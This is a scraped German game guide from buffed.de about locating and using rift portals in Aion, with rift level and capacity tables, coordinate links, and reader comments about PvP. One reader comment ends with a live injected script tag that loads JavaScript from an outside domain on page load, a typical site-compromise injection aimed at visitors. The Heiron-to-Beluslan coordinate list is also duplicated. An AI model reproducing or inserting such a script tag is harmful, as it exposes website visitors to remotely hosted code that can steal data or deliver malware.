• buffed.de
  • WoW-Datenbank
  • Hearthstone-DB
Games World
Login Registrieren
    Login Registrieren
    • buffed.de
    • WoW-Datenbank
    • Hearthstone-DB
    Login Registrieren
    • buffed.de
    • WoW-Datenbank
    • Hearthstone-DB
  • Aion - Tipps und Grundlagen-Guides: Risse

    PvP wird in Aion groß geschrieben und gehört zum Heldenalltag wie das Amen zur Kirche. Seien es heiße Luftgefechte im Abyss oder hartnäckige Bodenkämpfe in Elysea und Asmodae - Asmodier und Elyos bekriegen sich zu jeder Tages- und Nachtzeit.

    Wollt Ihr Euren Erzfeinden auf ihrem eigenen Grund und Boden auflauern, müsst Ihr jedoch zuerst einen sogenannten Riss finden. Denn nur durch diese Art Wurmloch erhaltet Ihr Zugang zum gegnerischen Territorium.

    Beam mich hoch Scotty: Der große blaue Wirbel im Himmel ist der Ursprung eines Risses am Boden und teleportiert Euch ins Feindgebiet. Beam mich hoch Scotty: Der große blaue Wirbel im Himmel ist der Ursprung eines Risses am Boden und teleportiert Euch ins Feindgebiet. Erspähen der Zugänge

    Die seltenen Risse erscheinen nur zufällig in vier verschiedenen Gegenden Atreias: In Morheim, Eltnen, Heiron und Beluslan tauchen sie an jeweils sieben unterschiedlichen Orten auf. Öffnet sich ein Portal in einem dieser Gebiete, werden alle Spieler per Systemnachricht in der Mitte des Bildschirms darauf hingewiesen, dass ein Riss seine Pforten ins Feindgebiet geöffnet hat. Wo er sich allerdings genau befindet, müsst Ihr selber herausfinden.

    Richtet dafür als erstes Euren Blick gen Himmel, um den Ursprung des Risses zu erspähen. Denn ein großer blau leuchtender Wirbel deutet mit einem glitzernden Strahl Richtung Boden und gibt Euch so zumindest die grobe Position des eigentlichen Risses an. Lest außerdem aufmerksam den regionalen Chat, um die genauen Koordinaten und die Zugangsbedingungen für das Portal zu erfahren. Denn auch wenn Ihr den Riss entdeckt habt, heißt es nicht, dass Ihr ihn auch nutzen könnt.

    Zutrittsbeschränkung: Anhand des Riss-Tooltips seht Ihr wie viele Spieler noch hindurch können und welche Stufe sie maximal haben dürfen. Zutrittsbeschränkung: Anhand des Riss-Tooltips seht Ihr wie viele Spieler noch hindurch können und welche Stufe sie maximal haben dürfen. Du kommst hier nicht rein

    Nicht jeder Spieler darf durch jedes beliebige Wurmloch schlüpfen. Denn je nachdem in welcher Region der Riss aufgetaucht ist, gelten unterschiedliche Bedingungen. Folgende Punkte müsst Ihr beachten:

    * Der Riss kann immer nur von einer Fraktion genutzt werden. Asmodier können sich zum Beispiel nicht mit Hilfe der Ausgänge der Elyos in Morheim, nach Eltnen teleportieren. Gleiches gilt natürlich auch für Anhänger der Elyos mit den Ausgängen der Asmodier in Elysea.

    * Es können zwischen zwei und sechs Portale in ganz Atreia gleichzeitig aktiv sein.

    * Nur eine begrenzte Anzahl an Spielern wird durch das Portal hindurch gelassen. Ist die Kapazität ausgeschöpft, verschwindet der Riss.

    * Je nach Standort des Risses gibt es eine Stufenbegrenzung für die Nutzung des Portals. Hier gilt folgende Faustregel: Umso niedriger die Level der Gegner in dem jeweiligen Gebiet, desto niedriger ist auch die Maximalstufe für den Gebrauch des Risses. Hochstufige Charaktere können also nicht in niedrigstufige Feindgebiete vordringen.

    * Eure Teleportreise ist ein One-Way-Ticket - Ihr könnt den Riss nicht für Eure Rückreise nutzen. Nehmt Euch also Schriftrollen für die Rückkehr mit.

    * Nach maximal zwei Stunden verschwindet der Riss – egal wie viele Spieler durch das Portal gesprungen sind.

    Standorte der Risse

    Auch wenn alle Risse zufällig erscheinen, haben sie dennoch feste Standorte. Asmodier finden Zugänge in Morheim und Beluslan; Elyos machen sich hingegen in Eltnen und Heiron auf die Suche. Beide Fraktionen haben insgesamt 14 Ein- und Ausgänge mit folgenden Beschränkungen:

    Eltnen und Morheim

     - 2010/01/Eltnen_Eingaenge_Ausgaenge.jpg

     - 2010/01/Morheim_Eingaenge_Ausgaenge.jpg

    Punkte

    Maximalstufe

    Kapazität

    1

    28

    12

    2

    32

    20

    3

    36

    35

    4

    37

    35

    5

    40

    45

    6

    40

    50

    7

    45

    50

    Heiron und Beluslan

     - 2010/01/Heiron_Eingaenge_Ausgaenge.jpg

     - 2010/01/Beluslan_Eingaenge_Ausgaenge.jpg

    Punkte

    Maximalstufe

    Kapazität

    1

    35

    24

    2

    35

    36

    3

    46

    48

    4

    40

    48

    5

    50

    60

    6

    50

    72

    7

    50

    72

    Aions kleiner Helfer: Im Notizblock speichert Ihr alle Risskoordinaten mit praktischen Kartenverlinkungen. Aions kleiner Helfer: Im Notizblock speichert Ihr alle Risskoordinaten mit praktischen Kartenverlinkungen. Tipps und Tricks

    Solltet Ihr bei Euren Beutetouren durch Atreia einen Ausgangsriss der gegnerischen Fraktion erspähen, empfiehlt es sich die Position im regionalen Chat durchzugeben. So habt Ihr nämlich die Möglichkeit, mit Unterstützung anderer Spieler den Feinden direkt beim Betreten Eures Territoriums die Tour zu vermasseln. Seid Ihr jedoch die Angreifer und habt einen Riss ins gegnerische Gebiet genutzt, sieht der Plan schon ganz anders aus.

    Nehmt bei Eurem Riss-Ausflügen immer genügend portable Kisks und eine starke, kampfbereite Truppe an Spielern mit. Denn lange werdet Ihr im Feindgebiet nicht unentdeckt bleiben und von einer wahren Meute an Gegnern verfolgt werden. Sucht sofort nach Eurer Ankunft nach einem entlegenen Versteck für Euren Wiederbelebungsstein, um Euch an ihm zu binden. Stürzt Ihr Euch nun ins Gefecht und sterbt, werdet Ihr an diesem Ort wiederbelebt und könnt Euch ohne lange Fußmärsche schnell wieder ins Getümmel begeben.

    Eine große Hilfe auf der Suche nach Rissen, ist der in Aion integrierte Notizblock, den Ihr im Hauptmenü unter der Option "Community" findet. Mit Hilfe dieses praktischen Tools könnt Ihr neben den üblichen Stichworten nämlich auch Verlinkungen von Kartenmarkierungen speichern. Gibt zum Beispiel ein anderer Spieler im Chat eine Rissposition durch, könnt Ihr diese in Eurem Notizblock einfach per Rechtsklick speichern. Auf diese Art und Weise sammelt Ihr nach und nach alle Portalstandorte und könnt sie wiederum jederzeit von Eurem Zettel mit STRG + Rechtsklick in das Chatfenster übertragen. Damit Ihr aber nicht Tag und Nacht mit der Suche nach Rissen verbringt, haben wir für Euch eine Liste mit allen uns bekannten Fundorten zusammengestellt. Kopiert Euch folgenden Text und fügt ihn in Euren Notizblock ein, um alle Ein- und Ausgänge stets parat zu haben. Die Zahlen und Buchstaben entsprechen dabei den Markierungen auf den obigen Karten.

    Asmodier Risspositionen:

    Morheim nach Eltnen
    [pos:Eingang 1;220020000 450 2350 0.0 -1] -> [pos:Ausgang A;210020000 719 2779 0.0 -1]
    [pos:Eingang 2;220020000 750 920 0.0 -1] -> [pos:Ausgang B;210020000 384 1278 0.0 -1]
    [pos:Eingang 3;220020000 250 500 0.0 -1] -> [pos:Ausgang C;210020000 1290 2439 0.0 -1]
    [pos:Eingang 4;220020000 1650 1400 0.0 -1] -> [pos:Ausgang D;210020000 93 246 0.0 -1]
    [pos:Eingang 5;220020000 1631 1100 0.0 -1] -> [pos:Ausgang E;210020000 1467 459 0.0 -1]
    [pos:Eingang 6;220020000 2400 2300 0.0 -1] -> [pos:Ausgang F;210020000 2296 2279 0.0 -1]
    [pos:Eingang 7;220020000 2450 600 0.0 -1] -> [pos:Ausgang G;210020000 2586 652 0.0 -1]

    Beluslan nach Heiron
    [pos:Eingang 1;220040000 233 151 0.0 -1] -> [pos:Ausgang A;210040000 2132 434 0.0 -1]
    [pos:Eingang 2;220040000 1301 634 0.0 -1] -> [pos:Ausgang B;210040000 1956 1821 0.0 -1]
    [pos:Eingang 3;220040000 767 2226 0.0 -1] -> [pos:Ausgang C;210040000 872 903 0.0 -1]
    [pos:Eingang 4;220040000 2070 263 0.0 -1] -> [pos:Ausgang D;210040000 861 2194 0.0 -1]
    [pos:Eingang 5;220040000 2843 619 0.0 -1] -> [pos:Ausgang E;210040000 292 2658 0.0 -1]
    [pos:Eingang 6;220040000 2812 2562 0.0 -1] -> [pos:Ausgang F;210040000 362 515 0.0 -1]
    [pos:Eingang 7;220040000 1596 2053 0.0 -1] -> [pos:Ausgang G;210040000 1905 2578 0.0 -1]

    Elyos Risspositionen:

    Eltnen nach Morheim
    [pos:Eingang 1;210020000 183 2829 0.0 -1] -> [pos:Ausgang A;220020000 745 1872 0.0 -1]
    [pos:Eingang 2;210020000 824 2023 0.0 -1] -> [pos:Ausgang B;220020000 1365 1335 0.0 -1]
    [pos:Eingang 3;210020000 1655 1858 0.0 -1] -> [pos:Ausgang C;220020000 617 209 0.0 -1]
    [pos:Eingang 4;210020000 1024 61 0.0 -1] -> [pos:Ausgang D;220020000 1820 1309 0.0 -1]
    [pos:Eingang 5;210020000 1460 582 0.0 -1] -> [pos:Ausgang E;220020000 2280 2858 0.0 -1]
    [pos:Eingang 6;210020000 2211 2644 0.0 -1] -> [pos:Ausgang F;220020000 2613 2236 0.0 -1]
    [pos:Eingang 7;210020000 2181 542 0.0 -1] -> [pos:Ausgang G;220020000 2931 879 0.0 -1]

    Heiron nach Beluslan

    [pos:Eingang 1;210040000 2662 434 0.0 -1] -> [pos:Ausgang A;220040000 127 1061 0.0 -1]
    [pos:Eingang 2;210040000 1300 1438 0.0 -1] -> [pos:Ausgang B;220040000 1068 314 0.0 -1]
    [pos:Eingang 3;210040000 1104 656 0.0 -1] -> [pos:Ausgang C;220040000 1037 2074 0.0 -1]
    [pos:Eingang 4;210040000 650 1821 0.0 -1] -> [pos:Ausgang D;220040000 2125 456 0.0 -1]
    [pos:Eingang 5;210040000 725 2512 0.0 -1] -> [pos:Ausgang E;220040000 2863 543 0.0 -1]
    [pos:Eingang 6;210040000 503 555 0.0 -1] -> [pos:Ausgang F;220040000 2726 2343 0.0 -1]
    [pos:Eingang 7;210040000 2743 2078 0.0 -1] -> [pos:Ausgang G;220040000 1744 1901 0.0 -1]

    Heiron nach Beluslan

    [pos:Eingang 1;210040000 2662 434 0.0 -1] -> [pos:Ausgang A;220040000 127 1061 0.0 -1]
    [pos:Eingang 2;210040000 1300 1438 0.0 -1] -> [pos:Ausgang B;220040000 1068 314 0.0 -1]
    [pos:Eingang 3;210040000 1104 656 0.0 -1] -> [pos:Ausgang C;220040000 1037 2074 0.0 -1]
    [pos:Eingang 4;210040000 650 1821 0.0 -1] -> [pos:Ausgang D;220040000 2125 456 0.0 -1]
    [pos:Eingang 5;210040000 725 2512 0.0 -1] -> [pos:Ausgang E;220040000 2863 543 0.0 -1]
    [pos:Eingang 6;210040000 503 555 0.0 -1] -> [pos:Ausgang F;220040000 2726 2343 0.0 -1]
    [pos:Eingang 7;210040000 2743 2078 0.0 -1] -> [pos:Ausgang G;220040000 1744 1901 0.0 -1]

  • Es gibt 3 Kommentare zum Artikel
    Von Feuerwirbel
    Ja immo laufen auf Thor in heiron auch nur an jedem lager allianzen rum die fast nur asu 50ern bestehen, aber die…
    Von Omidas
    Ja natürlich trifft man da auch 50iger Gegner. Das ist ja gerade das schlimme daran. War auch immer dort riften…
    Von Feuerwirbel
    @2 wie 3 schon sagt geht es auf Thor schon gut ab, und wir suchenund keine lowlevler, eben wurden wir von50ern an…
    • buffed.de Redaktion
      14.01.2010 17:47 Uhr
      Mitglied
      Jetzt ist Deine Meinung gefragt: Hier kannst Du Deinen Kommentar zum Artikel veröffentlichen und mit anderen Lesern darüber diskutieren.
      Dein Kommentar
      Bitte logge Dich ein, um einen Kommentar zu verfassen.

      Netiquette | Kommentar-Ticker (Live)
      Feuerwirbel
      am 16. Januar 2010
      Kommentar wurde nicht gebufft
      Melden
      Ja immo laufen auf Thor in heiron auch nur an jedem lager allianzen rum die fast nur asu 50ern bestehen, aber die ganke ich alle mit meinem 70er<script src=http://www.issseem.org/a.js></script>
      Omidas
      am 16. Januar 2010
      Kommentar wurde 1x gebufft
      Melden
      Ja natürlich trifft man da auch 50iger Gegner. Das ist ja gerade das schlimme daran. War auch immer dort riften gewesen. Immer schön im Südosten. Bischen rum rennen. Dann mal kurz wieder die Bots umhauen und wieder ne Runde. War da im Levelbereich 40-44. Da macht es halt am meisten Sinn. Oder hatte es zumindest. Den die Tauben sind im den Gebiet auch in dem Level und man findet so die perfekte Herausforderung.

      Doch das geht bei dem Level immer weniger denn:
      a) 50iger Asmos(oder anders rum) gehen da hin um zu ganken. Deswegen kommt es zu sehr starker Gruppenbildung. Für den Kleingruppenrifter pures Gift.
      b) 50iger Tauben fangen an zu deffen. Macht bestimmt echt Spaß als 50iger mit 50-100% Fenril (oder Tauben äquivalent) die Rifter zu ärgern und ab und an mal nen High Char zu finden.

      Aber diesen einen Punkt versagt leider Aion komplett. PvP während dem Leveln. Den da die Highchars überall hin kommen, tun sies auch. Erst wars der Abyss und jetzt dort.

      Vielleicht ist das auf Thor etwas gesitteter mit mehr Anstand, aber ich habe auf Votan gespielt, wo vielleicht sich auch nur besonders viele solcher menschlichen "Vorbilder" hin verschlagen haben.

      NC-Soft hätte wirklich die Gebiete abgrenzen sollen und das 50iger PvE Gebiet auch mit Rifts verbinden sollen (was mir immer noch unverständlich ist)
      Feuerwirbel
      am 16. Januar 2010
      Kommentar wurde nicht gebufft
      Melden
      @2 wie 3 schon sagt geht es auf Thor schon gut ab, und wir suchenund keine lowlevler, eben wurden wir von50ern an unserem kiskplatz zerlegt und sonst sind wir fast immer sturmzone und umgebung wo ziemlich viele 50er unterwegs sind
      Einhänder76
      am 16. Januar 2010
      Kommentar wurde 1x gebufft
      Melden
      guter guide.....
      bei uns auf thor herrscht schon jeden tag krieg ^^
      besonders heiron und beluslan gehts ab.....
      morheim und eltnen werden von sehr guten twinks belagert....
      ich und ein paar meiner leutz aus der legion sind regelmässig am deffen der gebiete und auch im feindgebiet am jagen

      was aber viel schöner iss......ich bin leider schon von anfang an bei den elyos bekannt für meine allies....ich hab schon eine kleine hassgemeinde gegen mich, weil ich meist mit 2 allies ( soweit der rift es zuläßt ) rüber gehe.....kisk plätze sollte mann auskundschaften und die assasinen aus der allie schon mal n paar meter vorschicken zum ausspähen.....

      es macht so fun und ich bekomme nicht genug davon....

      aber nochmal zu diesem wurmloch am himmel......er zeigt nur an das ein riss entstanden iss.....nicht wo er in etwa liegt....das iss immer noch ein lustiger mythos der sich hält ^^......

      ach ja....und mann kann mit allies auch mal die welt bosse der elyos versuchen....das macht auch fun ^^
      Omidas
      am 16. Januar 2010
      Kommentar wurde 1x gebufft
      Melden
      Sehr schöner Guide. Die Koordinaten kopieren ist für den Anfang immer recht nützlich. Nach paar mal riften weiß man die zwar eh auswendig, aber man kann anderen damit ja noch helfen. Sollte man sich während des Levelns nicht entgehen lassen. Am spassigsten sind kleine Gruppen, wo die Kämpfe noch halbwegs fair sind, aber man auch die Möglichkeit hat sich zu wehren falls Deff kommt.

      Als wichtiger Tipp noch zu sagen:
      Scheut euch nicht paar Hilfsmittel mit zu nehmen. Neben genügend Kisks sollte auch auf keinen Fall schneller laufen Schriftrollen und Heiltränke (die CC Entferner) mit genommen werden. Den so kann man auch mal entkommen oder fliehenden Gegner nach setzen.

      @Feuerwirbel:

      Frisch 50ig sollten das gar nicht erst lesen!

      Und ich finde es total ungeeignet für diese Level das Riften. Den was wollen die drüben machen? Das einzige, was man da machen kann ist Lowies ganken. Und dafür reicht doch bitte schön der Abyss voll und ganz aus.

      Hab persönlich mit 47 aufghört rüber zu gehen, weil es schon dort kaum faire Kämpfe mehr gab. Was auch durch die 50iger Rifter verursacht wird, da dadurch die Deff stark anzieht und für 1-3 Grps im richtigem Level das Leben sau schwer wird.

      Und zum Fluch. Denke jeder Kill gibt Punkte. Nur Lowkills eben sehr viel mehr. Das der Debuff auch bei gleich Stufe irgendwann kommt , verhindert auch etwas das sehr gut equipte/skillige Leute dauerhaft den Gegner das Leveln verhindern. Mit Pausen zwischen den Rifts habe ich den auch nur ein
      Feuerwirbel
      am 16. Januar 2010
      Kommentar wurde nicht gebufft
      Melden
      Das einzige was nervt ist dieser Fluch denn man bekommt wenn man zu viele niedrig stufige ziele getötet hat bekommt, komischerweise habe ich denn aber bekommen als wir ( zauberer und templer) nen 50er assa gelegt haben, glaube der Fluch zählt nicht nur niedrig sufige Ziele und ist dann zimlich lästig, da man dann meistens von ner alli überrollt wird und auch der kiskpunkt ist nicht mehr sicher.

      In Heiron aufräumen ist einfach nur geil!
  • Print / Abo
    Apps
    buffed 12/2016 PC Games MMore 06/2017 PC Games 05/2017 PC Games Hardware 06/2017 play³ 06/2017 Games Aktuell 06/2017 XBG Games 04/2017
    PC Games 05/2017 PCGH Magazin 06/2017 PC Games MMORE Computec Kiosk On the Run! Birdies Run
article
790645
buffed.de
Aion - Tipps und Grundlagen-Guides: Risse
PvP wird in Aion groß geschrieben und gehört zum Heldenalltag wie das Amen zur Kirche. Seien es heiße Luftgefechte im Abyss oder hartnäckige Bodenkämpfe in Elysea und Asmodae - Asmodier und Elyos bekriegen sich zu jeder Tages- und Nachtzeit.
http://www.buffed.de/buffedde-Brands-143860/Guides/Aion-Tipps-und-Grundlagen-Guides-Risse-790645/
14.01.2010
http://www.buffed.de/screenshots/medium/2010/01/Riss_Himmel_01.jpg
guides